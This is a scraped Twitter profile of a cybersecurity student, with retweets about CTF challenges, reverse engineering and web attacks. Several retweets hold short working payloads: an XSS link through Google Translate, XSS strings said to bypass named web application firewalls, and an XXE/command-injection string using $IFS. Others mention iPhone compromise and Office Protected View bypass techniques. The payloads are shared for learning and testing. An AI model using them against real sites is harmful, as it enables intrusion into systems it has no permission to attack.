Jonathan

@jonoans

cybersec student @ singapore polytechnic

Vrijeme pridruživanja: prosinac 2018.

Tweetovi

Blokirali ste korisnika/cu @jonoans

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @jonoans

  1. proslijedio/la je Tweet
    31. sij

    If you want to try my web challenge for the FIC2020, it will be available at for a few days. It's intended to be a ~30min chall. Good Luck/Have Fun

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    28. sij

    XSS using Google Translator hxxps://translate.google.com/?hl=en#view=home&op=translate&sl=vi&tl=en&text=%3Ciframe%20onload=%22javascript:alert(document.domain)%22%20id=%22xss%22%20role=%22xss%22%3Ehello%20xss

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  3. proslijedio/la je Tweet
    18. sij

    Does anyone else like to reverse engineer websites? Like, inspect headers to see where it's hosted, use chrome extensions to see what it's built on, and check the network tab to see what requests are being made? Thinking about writing up on it, or is this just me?

    Poništi
  4. proslijedio/la je Tweet
    7. sij

    Spooky dev environment hack: add 127.0.0.1 xn--9q8h to /etc/hosts and then all your dev servers can be accessed at http://👻 It's localghost!

    Poništi
  5. proslijedio/la je Tweet
    9. sij

    Today learnt: how to not protect your content with User Agent identifications. It’s just too simple to be forged. Poor sysadmins. They probably learnt this today as well. 😂😂

    Poništi
  6. proslijedio/la je Tweet
    7. sij

    I recently discovered 's channel on YouTube. A lot of stuff about old video game copy protections (arcade, console, PC), emulation, game development, etc. Good production values, too. Great stuff for reverse engineering enthusiasts.

    Poništi
  7. proslijedio/la je Tweet
    4. sij
    Poništi
  8. proslijedio/la je Tweet
    1. sij

    Why not step into the next decade with WAF bypasses? Here are some gifts.😎 - Imperva <a69/onclick=write&lpar;&rpar;>pew - DotDefender <a69/onclick=[0].map(alert)>pew - Cloudbric <a69/onclick=[1].findIndex(alert)>pew Happy 0x32303230.😉

    Poništi
  9. proslijedio/la je Tweet
    1. sij

    ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ 100%

    Poništi
  10. proslijedio/la je Tweet
    30. pro 2019.
    Poništi
  11. proslijedio/la je Tweet
    28. pro 2019.

    For my reverse engineering friends, patching a binary might be easy. But, if you are starting it can be challenging, here is a post I wrote on how to patch a binary using radare2. Also shows the same task using vim and xxd.

    Poništi
  12. proslijedio/la je Tweet
    27. pro 2019.

    Remotely Compromising an iPhone over iMessage

    Poništi
  13. proslijedio/la je Tweet
    28. pro 2019.

    Need to execute a payload with a space? More than one word can be executed if "$IFS" is used instead. Example: <!ENTITY xxe SYSTEM “expect://ls$IFS-la$IFS/”>]> Or /index.php?|ls$IFS-la$IFS/tmp

    Poništi
  14. Poništi
  15. proslijedio/la je Tweet
    20. pro 2019.
    Poništi
  16. proslijedio/la je Tweet
    12. pro 2019.

    I have just published this funny post: From iPhone to NT AUTHORITY\SYSTEM :-) cc

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    11. pro 2019.

    When an advisary (pentester, red team, attacker, etc) dumps hashes from the AD database file (NTDS.dit), they own the AD environment. They can use the hashes directly or crack them for clear text pw. NTDS.dit includes user & computer hashes which means all have to change. Why?

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    9. pro 2019.

    I decided to create a tutorial called "Reversing Windows Internals" and explain about Windows Internals. The first part describes about Handles, Callbacks and Hidden Callbacks and ObjectTypes in Windows Thanks to for answering my questions.

    Poništi
  19. proslijedio/la je Tweet

    Well, since didn't find my bug report to be worth rewarding or fixing anytime soon, I figured I'd drop the blog. Hoping Red Teams can enjoy using this technique to bypass Protected View in Office documents! 📄🎣

    Prikaži ovu nit
    Poništi
  20. proslijedio/la je Tweet
    18. stu 2019.

    The definitive recording of HTTP Desync Attacks is now live, courtesy of !

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·